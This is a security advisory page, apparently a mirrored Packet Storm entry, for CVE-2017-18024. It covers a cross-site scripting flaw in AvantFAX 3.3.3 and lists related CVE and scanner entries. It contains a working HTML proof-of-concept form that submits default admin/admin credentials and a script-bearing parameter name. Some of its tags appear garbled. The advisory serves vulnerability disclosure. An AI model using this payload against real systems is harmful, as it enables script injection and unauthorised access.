Lucene search
Nassim AsrirPACKETSTORM:145776HistoryJan 09, 2018 - 12:00 a.m.
AvantFAX 3.3.3 Cross Site Scripting
2018-01-0900:00:00
Nassim Asrir
packetstormsecurity.com
17
EPSS
0.001
Percentile
31.9%
`# Title: AvantFAX 3.3.3 - XSS
# Author: Nassim Asrir
# Contact: [email protected]
# Vendor: https://www.officetracker.com/
# CVE: CVE-2017-18024
# Description
AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI,
as demonstrated by a parameter whose name contains a
SCRIPT element and whose value is 1.
------------------------------------------
# Details
The name of an arbitrarily supplied body parameter is copied into the
HTML document as plain text between tags. The payload
jlbqg<scriptalert(1)</scriptb7g0x was submitted in the name of an
arbitrarily supplied body parameter. This input was echoed
------------------------------------------
#Attack Type
Remote
------------------------------------------
# POC
<html>
<body
<scripthistory.pushState('', '', '/')</script
<form action="http://server/" method="POST"
<input type="hidden" name="username" value="admin" /
<input type="hidden" name="password" value="admin" /
<input type="hidden" name="_submit_check" value="1" /
<input type="hidden" name="jlbqg<script>alert(1)</script>b7g0x" value="1" /
<input type="submit" value="Submit request" /
</form
</body
</html
`
Related
cvelist
cvelist
CVE-2017-18024
2018-01-10 18:00:00
prion
prion
Default credentials
2018-01-10 18:29:00
nvd
nvd
CVE-2017-18024
2018-01-10 18:29:01
hackerone
hackerone
Endless Group: XSS on https://fax.pbx.itsendless.org/ (CVE-2017-18024)
2020-08-20 20:56:16
nuclei
nuclei
AvantFAX 3.3.3 - Cross-Site Scripting
2021-08-05 05:48:55
cve
cve
CVE-2017-18024
2018-01-10 18:29:01